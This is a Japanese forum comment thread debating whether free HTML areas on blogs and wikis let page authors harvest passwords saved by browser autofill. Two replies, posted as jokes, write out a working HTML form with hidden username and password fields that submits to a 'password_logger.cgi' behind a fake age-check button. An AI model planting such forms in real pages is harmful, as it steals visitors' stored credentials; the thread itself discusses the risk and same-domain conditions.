アカウント名:
パスワード:
ユーザー毎にサブドメインをつけるタイプ以外は
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
目玉の数さえ十分あれば、どんなバグも深刻ではない -- Eric Raymond
自由なHTML記述 (スコア:1, 興味深い)
>意見もあるでしょう。
livedoor wikiのフリーエリア、やばくないか?
#ってここに書いちゃっていいのか?
Re:自由なHTML記述 (スコア:1)
Re:自由なHTML記述 (スコア:1)
Re:自由なHTML記述 (スコア:0)
1. inputタグ + type="password" が書ける。
2. そこで得た情報を何らかの方法で送信できる。
という二つの条件をクリアしなければいけない。
で、2.のやり方は限られていて、
2-1 submitボタンを何らかの方法で踏ませる。
2-2 スクリプトを使う。
の二種類が考えられるが、2-1は非現実的な匂いがする。詰めて考えれば不可能ではないと思うが、普通は2-2だろう。
つまり、「何らかの方法で、スクリプトが書けるかどうか」に問題が集約されるといっていい。
wikiは一見どんなHTMLでも自由に書けそうな気がする
Re:自由なHTML記述 (スコア:5, おもしろおかしい)
<p>18歳以上ですか?</p>
<form action="password_logger.cgi" method="post" style="display:inline">
<input type="text" name="username" value="" style="display:none">
<input type="password" name="password" value="" style="display:none">
<input type="image" name="yes" src="yes.png" alt="YES">
</form>
<form action="http://www.yahoo.co.jp/" method="post" style="display:inline">
<input type="image" name="no" src="no.png" alt="NO">
</form>
Re:自由なHTML記述 (スコア:0)
<p>18歳以上ですか?</p>
<form action="password_logger.cgi" method="post" style="display:inline">
<input type="text" name="username" value="" style="display:none">
<input type="password" name="password" value="" style="display:none">
<input type="image" name="yes" src="yes.png" alt="YES">
<input type="image" name="no" src="no.png" alt="NO">
</form>
こっちの方が完璧でね?
Re:自由なHTML記述 (スコア:2)
ブログでもサイドバーにJavaScript+HTMLを記述可能にしているところは多いんじゃないかな?
あと条件として同一ドメインというのがあって、ココログのようにユーザ毎の別ドメインになっているところは該当しない。
livedoor wiki のフリーエリアは、、、 (スコア:1)
http://wiki.livedoor.jp/
コンテンツ管理は
http://cms.wiki.livedoor.com/
認証は
http://member.livedoor.com/
のように別ドメインになっていて、
フリーエリアが埋め込まれるのは、
公開してる領域のみなので XSS は出来ないように思うし、
今回の件も適用されないんじゃないかと思うのだが?
# 見落してる穴がなければ良いのだが、、、(- -;;;)
uxi
Re:livedoor wiki のフリーエリアは、、、 (スコア:0)
見えるが、それは別の理由でまずくないか?
Re:自由なHTML記述 (スコア:1)